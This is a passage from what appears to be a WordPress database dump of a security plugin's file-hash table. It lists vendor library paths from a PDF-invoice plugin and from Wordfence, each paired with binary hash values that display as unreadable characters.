','',0,'?'),('BZׂHZlKO','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Upper_Sorbian_Germany.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yXA-,','}ִiEf:kkӘ4L<','',0,'?'),('Bl{','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Urdu_Islamic_Republic_of_Pakistan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/`z؝{{7','>0*zlrVwR*X0R-\\','',0,'?'),('?л/8DG2az=','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Uzbek_(Cyrillic)_Uzbekistan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('6ߘUS#!','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Uzbek_(Latin)_Uzbekistan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n};k_','p\nxv\\[U9','',0,'?'),('{Q3V]','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Vietnamese_Vietnam.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ם\'Nh{Zp','AnZ\rzn|)p\\6qt','',0,'?'),('3{wwO}','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Welsh_United_Kingdom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dB4DRƱr(','VUsڌ\nQOcV;=]','',0,'?'),('r*k[]P','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Wolof_Senegal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('=nȱv7}','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Yakut_Russia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\'үL~s\n','ox<5>IŚsh[% ','',0,'?'),('fǫCÔ\0','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Yoruba_Nigeria.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('wbM	D%|','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/isiXhosa_South_Africa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('\0.S~͔ ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/isiZulu_South_Africa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('iv\Z	l','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YAyiN8F','~tbGj9!\rp^a\0vG','',0,'?'),('i$Z\ZGbgL_	','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/compress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s\'l','1ZoT{&w!JD*(d','',0,'?'),('5<	LL','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(CN@kG+(G\Z','l^Fxtjlf.D}<x	','',0,'?'),('Ե7Ng#/O','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/config_fonts-distr-without-OTL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C,\n_D?V0','<,`}bE)⾖y&@m+uXo;','',0,'?'),('L))(do','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/config_fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y(ߙɌVn','YqY꣑fE`XImDtjʈY','',0,'?'),('B؆H?jܓ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/config_lang2fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']$\r^;','6E8&<LCpDHJE','',0,'?'),('p(Z\Z/Ӣ.','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/config_script2lang.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i:Q$zq;\"','w2,;т;`:Я6','',0,'?'),('J֫cRn:','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ccourier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6	Hj^\0B<-!','A?Z!@-k=+]\'ˋ\'yq<','',0,'?'),('3wˠ1T±$','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ccourierb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}FZug<2pb\rs','J̫0Cu[y/\'\rGv{wdct1u','',0,'?'),('ݘ[','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ccourierbi.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y!lS{','6HP$ؠO\rCh`Ylk\"2^','',0,'?'),('@7|2\n3t#','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ccourieri.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%h[+yk>','wIts=F;!ci^','',0,'?'),(':ՏycL,m','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/chelvetica.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hBuqj','$R_BP\r8u)OɔEA?P','',0,'?'),('G)%?	FA','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/chelveticab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9ba IAOU','~̭ʖlYޫN#+ɚwK','',0,'?'),('N9ЀnԲ|','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/chelveticabi.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9|(4','oy<:>´[;+QmW\'0x3 ','',0,'?'),('4\'~D<!<Ow\nk','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/chelveticai.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RՇtxvDS\'w','Mx4euZ+1yfsN','',0,'?'),('\'M\rE','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/csymbol.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':N}QN\ZԜ+F','j-j[*Dw5yD} D','',0,'?'),('&~zcDWmJu','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ctimes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BڇeBI',',BqW}cFg\ZE\0)Q','',0,'?'),('68t߭~C','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ctimesb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$#sKw@L','\n\0eH^PSE;Wjv','',0,'?'),('uŲQd.&\\','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ctimesbi.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&J|ҥܱ','kaU^2͇Qfצ;H|\"\0>','',0,'?'),('m}ik\'{~s','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/ctimesi.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?l 4DJ~F>','t2\r=[c\0','',0,'?'),('8\rp\0','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/font/czapfdingbats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x\'\'،\'@|7{_','\rRzfu\'4qŏ6{ZJ','',0,'?'),('p2b@?˞y','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/graph.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ف$|x~R#E','=U\n!;#I.R\"$kbK\r%A','',0,'?'),('5]Z9wM','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/graph_cache/.gitignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IT?C7SQ޿','fgXC@ag2}_JqѸ(̢','',0,'?'),('eZ\"qpׇqZ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/iccprofiles/sRGB_IEC61966-2-1.icc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tqڶAH-f','iGE:1ĥ)MXL0 Hj^','',0,'?'),('SIn/|','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/CJKdata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W-ajp5v@','Phҟ!TCVbb4tQ','',0,'?'),('c\\+V-Yg','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')IE\nNhu','<_E񀸯x`* i=','',0,'?'),('(xo=[zt','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/linebrdictK.dat',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1_eKO2','w{{j΃l=P\'r7@ŗ$`#b','',0,'?'),('AI,3ߴ	[]H','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/linebrdictL.dat',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C!\ZxB','l$+&ֱ2zU,hgo0)','',0,'?'),('&Kx5[d','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/linebrdictT.dat',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','҂D[M^~k','Q!]\rqOGwy_%\ZKC1','',0,'?'),('S&;yaYqSB|$','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/no_image.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0]=}0','}:tdCg)K ŗn(WDf~|3CF','',0,'?'),('F|nMB\n#9','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/out.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G\0i','\r	p`c\\_1ڂԯR?a[<:*worp','',0,'?'),('uRi\rW\\D','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/subs_core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g4=( b^i','Qh%DJlxHt{e<c','',0,'?'),('؞\nH*YLR','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/subs_win-1252.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.KI\ZZa+','!HF*k?ʟ\'FZno','',0,'?'),('`e7O','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/includes/upperCase.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TE\'J<X','.o4(q>GVBp(~9ەtF$','',0,'?'),('@vo\0<L','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/lang2fonts.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1z/4gɠ','Ѽ=23-0)','',0,'?'),('\Z;!l@%3Oq','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/mpdf.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$x)R?]\nĪ','L;=KtփbjFJ}z.','',0,'?'),('FgG$/qe','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/mpdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LZ	)u%','	3!}MDwf`UE@~)6{q','',0,'?'),(':L+h:y}\"0','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/NOTES.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',z\00}䥟','_b[1\Z\0*~ً+','',0,'?'),('gC:[7L','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/de.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d턏8','GR!jOD¸6ֆ]ݛڃ%*','',0,'?'),('N@dn]oa:A\n','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/dictionary.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Է9hHn8:;','i2FjIQY6WjW}','',0,'?'),('o3gesV5Sފ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/en.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',O(Sړ(Q','\"%罃̔uZ.fTAvy*f6','',0,'?'),('FvT.ПqA','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/es.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mAwN|&','}=$JMP\\|$qh','',0,'?'),('qh:mHaiޚ54$$','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/fi.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';u_%p&','E*(~ 0}~kDB}6!b','',0,'?'),('F &#0L>2','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/fr.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=p\Zȥ0\Z\nt\\y1\'','34l3v!dpcjS','',0,'?'),('\n]	/as','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/it.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qF\r-vM','q1D.F^R>~S1`ML%C)','',0,'?'),('um\r}蓿ը$M','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/nl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qs/zȺB','?qm	PW%@3<Kj>/&','',0,'?'),('N7\n6֥Kh','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/pl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/xdO$?e׿','4%)Cxf[t(l','',0,'?'),('˧	W6%H5g#','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/ru.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V	gVx:k','\"QmAƞ)ܑFЀ`k˚','',0,'?'),('ҫ)Tntȇ-i,','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/patterns/sv.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A!`%mD?','TVI	!GD!.ML\'\ZR','',0,'?'),('Yӊ.#rUm','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/phpunit.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d_ތ}%','E\'`tlwWF`\n	','',0,'?'),('0\"\0Sؠ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/progbar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\09/n','$7|\0\'#5p+.s]','',0,'?'),('rss}tE','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tests/MPDITest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WUvEY !0F\Z*','D\nId}\"9R^wUg','',0,'?'),('U^GWH9','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tests/WriteHtmlTest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c^\ro_b',']K\'7JkzO\r#zg','',0,'?'),('nbܑx{','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tests/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3%o\\','8K2m_uFಣtxFCU}.\'Q','',0,'?'),('O[Fdɡ$iF(m.','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tests/data/pdfs/2-Page-PDF_1_4.pdf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>y`xMOΜ','|V/Sb}ͪs\ZNA؋F^mvIv>','',0,'?'),('P{:[bk?','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tests/mPDFTest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';בtDMzlj','KAJ]L@nkM`ն>Fza','',0,'?'),('FRɀB','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/tmp/.gitignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IT?C7SQ޿','fgXC@ag2}_JqѸ(̢','',0,'?'),('N\\f#X!A','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfontdata/.gitignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5H5eT1x(','fgXC@ag2}_JqѸ(̢','',0,'?'),('\nR3`md','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/DejaVuSansCondensed-Bold.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c[Ջ7<e','2@^,X5B@?UycȲ~J','',0,'?'),('E3\"\ZM[Pl','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/DejaVuSansCondensed-Oblique.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 3\\Fbzۺ','ɟ<}B$EHvo[QoJJ~Ɩj9','',0,'?'),('H2J7Ӫ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/DejaVuSansCondensed.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ַT\n]r\"C','Vh4CK24 `\rdu%0\0','',0,'?'),(' E~2R\\Y\'','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/Garuda-Bold.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pڨU','cJ앺Rw=?465','',0,'?'),('@iM͇قf}','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/Garuda-Oblique.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?)RQ <','\"7!KW]xCZbc#Y\Z 8R\"','',0,'?'),('p_-M','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/Garuda.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\r*~LDet','Xx3KԙgE;bb^<<Pc','',0,'?'),('D69${TC','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/SimSun.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c\Z@;..~v','D`$\n=@З%YTկm]','',0,'?'),('sb;3쁈Lzu','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/UnBatang_0613.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\'-Rg','%y\nr7-d4xlʝV','',0,'?'),('\n0B,Gxz','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/XB Riyaz.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';6ç#2t','۷3	\Zh<cVn=sP','',0,'?'),('@q;4BT\n','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/XB RiyazBd.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Crt N~ƿڔ','H?pet4L&cF64','',0,'?'),(',XǑ-SRq\n','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/ttfonts/XB RiyazIt.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>˳Ϧ','\\ovvXJzP#$RA\"1bL','',0,'?'),('mze4U,A.','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/UnicodeData.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\\ʯwz9S|','bfC=`~,\'fBI','',0,'?'),('3.~^Rj','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/UnicodeRanges.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j6De臔','ЊL²zqELH$ꀙ)Ri','',0,'?'),('߉ˢssbjyo','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/font_collections.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0}{C','4M<Y3V7tPkUj','',0,'?'),('0rG^C\\LvK','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/font_coverage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fy|k,<','i`y=#	oP]','',0,'?'),('q󰖇R2N','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/font_dump.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|M<[}d8+|','A	nί/|\rw%\Z%','',0,'?'),('>C|JN)w','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/font_dump_OTL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9R\'2nh',' IݾZ\ZojNmZ]','',0,'?'),('[u!\n3','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/font_names.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>3[$%&H','k\rLJDl:ٸfޒIu\0D:','',0,'?'),('6>7hn6q','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/image_details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.m#u94\'\n!','z,8/pˇ,]utYO\Ze','',0,'?'),('\'Yj>mN','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/utils/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xogQ}q','C|\0\\֛bB^ZQhlg`پF','',0,'?'),('F_P\0nցX{-3','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X}8t+kS','ok$Onmau=V6JWN͏be','',0,'?'),('o;-:ӻ6Yk-r','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mVhh4','X$ݹjfQ\Z<D`ƌݨY\\','',0,'?'),('3+N@mNxC_KW','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pCE-\r6','dφk|s꾂ھt*Y7','',0,'?'),('g !xUB,]sbs%','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/filters/FilterASCII85.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q;tKac2','I8*nq+@{','',0,'?'),('l9s醣O@8j','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/filters/FilterASCIIHexDecode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.X-ό~U','*%R	(JC&]EЉ~\Z$TcrYD','',0,'?'),('s}:0YָMT','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/filters/FilterLZW.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vtݱ\'W$\Z ','=Or}v.d\Z<A7{4','',0,'?'),('COpsM0Z','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/fpdf_tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8Fw\n-R\nS2',',yhalq͍qW	','',0,'?'),('ԻXty0)u','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/fpdi.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&R3]}6>rM','ذ&ϝ]#׷֔\"戂','',0,'?'),('qOJeڶ3','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/fpdi_bridge.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2%ѷXjӒi','X=ĩܬ','',0,'?'),('	l\"[`#','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/fpdi_pdf_parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y+^޺fÃ','n$4WlG0ZMdmRb','',0,'?'),('7\nek	s','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/pdf_context.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',y~5<p{#Z','xU?{JT69/|<Zʐpg','',0,'?'),('RED,84;BG','wp-content/plugins/woocommerce-pdf-invoices/vendor/setasign/fpdi/pdf_parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Y','4KDAqy{N6<N՝s	\nߺ^','',0,'?'),(')^x[$','wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/.gitignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pR2LrЪAr','t /\r[P&\\A2O[{','',0,'?'),('[Eg1x','wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z-fm֙','ybޞp@m˻d6En0+!8','',0,'?'),('6\"|\r}!.\n','wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/b`\"t','P6%1dlLش=;a%baV','',0,'?'),('Ck[tȦPʪ_','wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܮ&<}rb\\V','E+Y}n\'[rN۝!	>X22','',0,'?'),(';$v[	븨','wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/lib/xrstf/Composer52/AutoloadGenerator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\Z\r(v:`N\n','qG\"w%\Zۻށg\\4^W','',0,'?'),('3D5eˆk','wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/lib/xrstf/Composer52/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȹ	Z^+}i','N{>Zށd@iVwWU;','',0,'?'),('6vY)NRS	','wp-content/plugins/woocommerce-pdf-invoices/vendor/xrstf/composer-php52/lib/xrstf/Composer52/Generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7j`1e=jv','\0\0%ȰW\n\0IHG(','',0,'?'),('*(*+Wjcp','wp-content/plugins/wordfence/crypto/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Կ:V	U\'','|<P*tg3dYs/','',0,'?'),('BImS967X','wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%*T*`','289vu3n	C2sva/','',0,'?'),('S\npލG%','wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']_#D\0','\Z ے%4~N~Gh!b:wɌ\'','',0,'?'),('a5ͅB_s','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EӤ㭇Mg','Q*\'B+Eߞ:myuW','',0,'?'),('kPP1<','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oul_4@','6b% \"ʴsJp38ӷSǙ:','',0,'?'),('MAH\0[d_!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5,}vĨ3G)','Er4@\0ԡ$z3$l\Z`iexl','',0,'?'),('8YvC[,','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\0>}LQ\0','_U\0]q=Չf\\/	@d\r+v*(','',0,'?'),('Zp%\'n\ZWj','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ț)W0\nM',';3Ub}V k\'Yr\nrH)6','',0,'?'),('PK2I